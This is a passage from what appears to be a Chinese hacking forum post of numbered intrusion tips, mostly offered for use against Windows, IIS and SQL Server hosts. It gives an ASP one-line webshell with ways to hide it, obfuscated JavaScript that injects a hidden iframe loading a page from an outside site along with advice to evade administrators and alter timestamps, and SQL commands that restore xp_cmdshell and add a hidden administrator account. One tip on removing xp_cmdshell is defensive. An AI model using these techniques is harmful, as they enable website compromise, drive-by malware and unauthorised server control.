0 N3 z3 u, F' ?1 I用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
0 O& P8 f6 y6 {+ c! F( `7 n1 q. c7 @% r
53、隐藏ASP后门的两种方法
" d0 t3 @3 U7 `+ h1、建立非标准目录:mkdir images..\
3 f0 J1 L0 n! P$ _拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp P3 k& x$ N! C" _7 v
通过web访问ASP木马:http://ip/images../news.asp?action=login ^1 v9 y8 y/ W/ m
如何删除非标准目录:rmdir images..\ /s
, a9 h+ P& |2 L. @5 l2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:; x3 G, c; E% c5 I/ B4 Y n
mkdir programme.asp5 K3 [/ c/ q/ U& w: Y
新建1.txt文件内容:<!--#include file=”12.jpg”-->
, g" f* R; y+ t新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件: f2 Y" \2 M. j$ A! R4 H
attrib +H +S programme.asp! ^. C* q/ M6 |9 }
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt: \) ~ o" ], p! g' S
7 U& `8 E; O5 B) G3 m2 |! Z
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
% p* `0 H3 Q5 l8 o然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
0 J5 i3 s& \# ?' a- z6 M& Z. @! R+ t1 k! O6 |3 D
55、JS隐蔽挂马
; _+ \/ N8 F5 i/ ?+ e0 ~9 k6 q2 U/ p1.- x0 S z$ I: {* C/ Q' e' c
var tr4c3="<iframe src=ht"; \( D4 [% d, o7 D6 P3 f4 v4 n
tr4c3 = tr4c3+"tp:/";3 S4 b Q( C3 I5 g8 U) A+ P
tr4c3 = tr4c3+"/ww";6 Y- R Z5 ~( I. ^
tr4c3 = tr4c3+"w.tr4";7 U, I4 @- o5 O: d, j: T4 k. c
tr4c3 = tr4c3+"c3.com/inc/m";' F, a# B ? z7 r
tr4c3 = tr4c3+"m.htm style="display:none"></i";
) i( r* c( L6 T, i6 k7 e6 qtr4c3 =tr4c3+"frame>'";9 o/ W8 v+ \ j# {% ]: V+ R
document.write(tr4c3);8 K2 N2 ]1 C9 ~
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。7 T3 H8 Q: i8 u& s% m0 g
# _7 e6 V ~# b) @* K6 s. J2.9 ? f! C ^0 M+ v" g) D
转换进制,然后用EVAL执行。如( O0 j, Z- ] N
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
, G, Q) X( }8 Y2 i. H' ]+ n6 s不过这个有点显眼。5 ?0 I8 x) \/ S9 r
3., D) M( z) i, D: x
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
0 M3 b0 J2 f& _+ a' j最后一点,别忘了把文件的时间也修改下。6 Z( r1 v7 p+ b G# r% u
$ i: z3 C* Q$ K% @- D S56.3389终端入侵常用DOS命令
5 q2 B! d3 {/ G0 E0 Etaskkill taskkill /PID 1248 /t
5 I: Y: }+ o K& W# Q3 ]- E
2 F9 A c$ y" `tasklist 查进程
9 l7 B2 P3 g$ I# L. I' _0 E
) C1 c1 f% n; Q/ c( V# Hcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限( X, e7 _- O9 i# n! l2 f) a
iisreset /reboot
4 _4 m/ Q6 u, _3 l# S* r: ttsshutdn /reboot /delay:1 重起服务器
6 E, D4 ~: O0 j1 u1 t6 U5 x: H& L6 s8 |3 Y
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
2 ?; X/ j1 G% G+ W4 c
; X0 a4 m5 F" x# w8 x# Tquery user 查看当前终端用户在线情况3 C7 [8 W5 K7 P) t& ]% ^3 r4 u
! |- `9 K7 X; \" Y+ S, _" s
要显示有关所有会话使用的进程的信息,请键入:query process *" c; ~! \4 r: T# K
) c7 I" @$ U4 G4 n# P) \8 Y, n要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
5 R" k3 z# {8 X! X! e' ~5 R* {; G- h
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2, a: Z( Y$ J' q9 a
6 E+ S( Q; F; i; T
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02: u1 p/ S& z8 X) P- d; B- U
% C" e. a4 u: s4 Y命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启5 k9 r6 m5 j& I0 ?2 z
$ |/ [7 E/ f* w) |% a' }命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统, w! D$ O7 k. u6 | U: C
1 K0 f' R7 m2 y- J
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。+ t* Q3 S. e+ f( q1 D* T2 u: t& h
+ c& C+ _2 }3 d, w5 O" q# S- Z命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
# b$ U5 W7 d. W2 v2 d* R: b0 B
5 Y8 _" _1 o4 _/ [4 |9 V56、在地址栏或按Ctrl+O,输入:
5 [4 B" n4 Y! @5 gjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;9 [# v: n9 K4 P2 K) C- l
9 [7 D! D. {4 {% K
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
- G h) v: ~: p3 A% ?9 Z9 c$ Q8 F" p
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
2 Q. B; Z6 k4 V* p' L用net localgroup administrators是可以看到管理组下,加了$的用户的。: T' X& }6 n e) g* q
- {9 ~! P1 D" @
58、 sa弱口令相关命令
, C' ^, h4 G( O! x
/ C9 B7 L- @$ `$ B: }6 ~一.更改sa口令方法:. I4 ?# G* v" l* v
用sql综合利用工具连接后,执行命令:
- M) _2 u7 t- c6 @/ o4 Dexec sp_password NULL,'20001001','sa'9 \ U4 y; i- M& O/ f1 x
(提示:慎用!). [5 s- r) i7 e/ |: R# F7 \+ C
2 b' b4 I9 o& @1 ]6 ?, [4 }
二.简单修补sa弱口令.: [2 ^* V; ?& Q7 G! O1 q9 M; \/ r- y
2 f. f' ?0 _1 A1 M2 [: B" t方法1:查询分离器连接后执行:
; H2 q& E, M/ I6 I2 j6 T, rif exists (select * from Z" n# l/ E1 v& d$ q8 L
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
6 v% ~5 b' X2 w9 N2 W6 r; [OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
: T# N6 B; W9 k7 o( p% _
1 ~8 V+ u" o2 x% b) x3 v! F9 [: Texec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
& M5 F+ Q' U1 A5 N
# ?+ v% y8 b/ q: K3 bGO
. A y7 l. ^% l3 `+ ~( L, P% j5 X4 B: y& v M! [' e
然后按F5键命令执行完毕/ I5 q3 s8 _# ?) W7 A
x4 I! z! {" h( w" ^" L+ F方法2:查询分离器连接后
8 P6 D" s! J2 L/ z' p' S/ a第一步执行:use master
9 `( ]! m* ` V' h n第二步执行:sp_dropextendedproc 'xp_cmdshell'
, Q" O+ t; n, t3 C& N然后按F5键命令执行完毕
0 u: W1 [9 w) {, ^: c
( N8 P& [5 t: F/ `' y5 E3 o" X. j; I5 J6 W) ?
三.常见情况恢复执行xp_cmdshell.
" O9 W+ g5 l3 M8 [7 F3 L9 m& P
. h1 F( l' I! o! j9 l/ g0 n% A0 X( q+ V- o9 E5 U, j
1 未能找到存储过程'master..xpcmdshell'. x' K1 z" T& R) Z h7 _4 J
恢复方法:查询分离器连接后,& u' t* D5 v0 K3 L' V! G4 K
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int; x6 F: G! I" m
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
& Q. a3 e8 V ?; D! y然后按F5键命令执行完毕
6 @2 d: s/ c- @, w* |
8 E; b; k# _$ i5 @5 h: V5 o( y) }* n2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
5 e) G7 ]; w7 K2 `# r恢复方法:查询分离器连接后,$ W) i* k% b7 j6 V# _( X# Q
第一步执行:sp_dropextendedproc "xp_cmdshell"
! b% P2 D+ M1 J! e第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
3 {3 T* Q" ?$ X5 ]8 G) M m然后按F5键命令执行完毕) j# S0 v6 Z6 O1 z
* h7 i& Z0 M- x7 |
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)* R( e- E3 z! S0 V8 p8 U
恢复方法:查询分离器连接后,# K2 ` D b7 _% S: p7 F
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
$ o. @; m; ~5 s! F& m8 L; X+ Z1 }第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' + G& t1 u! k' u( W* O5 [+ _
然后按F5键命令执行完毕5 {$ \+ u, \1 d* j0 E5 s
, k8 |4 r l9 e- ^7 o3 a
四.终极方法.
. T/ ]# R9 |& _; V: {5 I: J) r如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:! u2 I* _8 C y, R& ~
查询分离器连接后,& {5 U- q' K( y2 R8 k
2000servser系统:
9 }7 [3 D5 C4 Sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'% Y2 z- y+ G+ C! b3 K
6 d2 H& B) D% rdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
/ i' O; j% r* _ o$ r% ?: @9 h1 m/ `: ]9 {9 R
xp或2003server系统:
4 R' O0 m- E. I+ x, z. J5 ]) O
/ U1 m% X, h7 {% T3 j5 mdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
# T! i9 Q8 f" g$ x! ~: {$ v
) j/ ~9 M2 C R" |2 zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'0 O" f I: I- s5 d u
|
发表于 2012-9-15 14:51:03
收藏
分享
支持
反对